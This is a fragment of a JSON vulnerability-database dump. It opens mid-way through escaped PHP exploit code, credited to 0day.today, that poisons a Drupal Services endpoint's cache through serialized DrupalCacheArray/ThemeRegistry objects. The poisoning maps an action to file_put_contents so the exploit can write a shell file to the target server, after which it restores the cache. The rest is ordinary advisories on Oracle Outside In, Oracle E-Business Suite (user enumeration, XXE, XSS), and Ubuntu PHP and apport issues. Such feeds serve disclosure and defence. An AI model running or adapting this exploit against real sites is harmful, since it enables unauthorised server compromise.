false)\r\n{\r\n e(\"Unable to obtains endpoint's cache value\");\r\n}\r\n \r\nx(\"Cache contains \" . sizeof($cache) . \" entries\");\r\n \r\n# Stage 2: Change endpoint's behaviour to write a shell\r\n \r\nclass DrupalCacheArray\r\n{\r\n # Cache ID\r\n protected $cid = \"services:endpoint_name:resources\";\r\n # Name of the table to fetch data from.\r\n # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()\r\n protected $bin = 'cache';\r\n protected $keysToPersist = [];\r\n protected $storage = [];\r\n \r\n function __construct($storage, $endpoint, $controller, $action) {\r\n $settings = [\r\n 'services' => ['resource_api_version' => '1.0']\r\n ];\r\n $this->cid = \"services:$endpoint:resources\";\r\n \r\n # If no endpoint is given, just reset the original values\r\n if(isset($controller))\r\n {\r\n $storage[$controller]['actions'][$action] = [\r\n 'help' => 'Writes data to a file',\r\n # Callback function\r\n 'callback' => 'file_put_contents',\r\n # This one does not accept \"true\" as Drupal does,\r\n # so we just go for a tautology\r\n 'access callback' => 'is_string',\r\n 'access arguments' => ['a string'],\r\n # Arguments given through POST\r\n 'args' => [\r\n 0 => [\r\n 'name' => 'filename',\r\n 'type' => 'string',\r\n 'description' => 'Path to the file',\r\n 'source' => ['data' => 'filename'],\r\n 'optional' => false,\r\n ],\r\n 1 => [\r\n 'name' => 'data',\r\n 'type' => 'string',\r\n 'description' => 'The data to write',\r\n 'source' => ['data' => 'data'],\r\n 'optional' => false,\r\n ],\r\n ],\r\n 'file' => [\r\n 'type' => 'inc',\r\n 'module' => 'services',\r\n 'name' => 'resources/user_resource',\r\n ],\r\n 'endpoint' => $settings\r\n ];\r\n $storage[$controller]['endpoint']['actions'] += [\r\n $action => [\r\n 'enabled' => 1,\r\n 'settings' => $settings\r\n ]\r\n ];\r\n }\r\n \r\n $this->storage = $storage;\r\n $this->keysToPersist = array_fill_keys(array_keys($storage), true);\r\n }\r\n}\r\n \r\nclass ThemeRegistry Extends DrupalCacheArray {\r\n protected $persistable;\r\n protected $completeRegistry;\r\n}\r\n \r\ncache_poison($endpoint, $cache);\r\n \r\n# Write the file\r\n$json = (array) $browser->post(TYPE_JSON, json_encode($file));\r\n \r\n \r\n# Stage 3: Restore endpoint's behaviour\r\n \r\ncache_reset($endpoint, $cache);\r\n \r\nif(!(isset($json[0]) && $json[0] === strlen($file['data'])))\r\n{\r\n e(\"Failed to write file.\");\r\n}\r\n \r\n$file_url = $url . '/' . $file['filename'];\r\nx(\"File written: $file_url\");\r\n \r\n \r\n# HTTP Browser\r\n \r\nclass Browser\r\n{\r\n private $url;\r\n private $controller = CONTROLLER;\r\n private $action = ACTION;\r\n \r\n function __construct($url)\r\n {\r\n $this->url = $url;\r\n }\r\n \r\n function post($type, $data)\r\n {\r\n $headers = [\r\n \"Accept: \" . TYPE_JSON,\r\n \"Content-Type: $type\",\r\n \"Content-Length: \" . strlen($data)\r\n ];\r\n $url = $this->url . '/' . $this->controller . '/' . $this->action;\r\n \r\n $s = curl_init(); \r\n curl_setopt($s, CURLOPT_URL, $url);\r\n curl_setopt($s, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($s, CURLOPT_POST, 1);\r\n curl_setopt($s, CURLOPT_POSTFIELDS, $data);\r\n curl_setopt($s, CURLOPT_RETURNTRANSFER, true);\r\n curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);\r\n curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);\r\n $output = curl_exec($s);\r\n $error = curl_error($s);\r\n curl_close($s);\r\n \r\n if($error)\r\n {\r\n e(\"cURL: $error\");\r\n }\r\n \r\n return json_decode($output);\r\n }\r\n}\r\n \r\n# Cache\r\n \r\nfunction cache_poison($endpoint, $cache)\r\n{\r\n $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);\r\n cache_edit($tr);\r\n}\r\n \r\nfunction cache_reset($endpoint, $cache)\r\n{\r\n $tr = new ThemeRegistry($cache, $endpoint, null, null);\r\n cache_edit($tr);\r\n}\r\n \r\nfunction cache_edit($tr)\r\n{\r\n global $browser;\r\n $data = serialize([$tr]);\r\n $json = $browser->post(TYPE_PHP, $data);\r\n}\r\n \r\n# Utils\r\n \r\nfunction x($message)\r\n{\r\n print(\"$message\\n\");\r\n}\r\n \r\nfunction e($message)\r\n{\r\n x($message);\r\n exit(1);\r\n}\r\n \r\nfunction store($name, $data)\r\n{\r\n $filename = \"$name.json\";\r\n file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));\r\n x(\"Stored $name information in $filename\");\r\n}\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/27274", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", 